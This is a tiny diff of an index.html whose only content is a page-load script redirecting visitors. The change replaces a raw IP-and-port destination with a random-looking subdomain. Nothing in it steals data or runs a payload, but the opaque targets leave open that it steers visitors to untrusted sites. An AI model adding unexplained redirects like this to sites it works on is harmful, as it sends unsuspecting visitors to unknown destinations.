--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script type="text/javascript">
-   window.location.href="http://47.109.57.174:31880";　
+   window.location.href="http://mecpy88j.beesnat.com/";　
 </script>
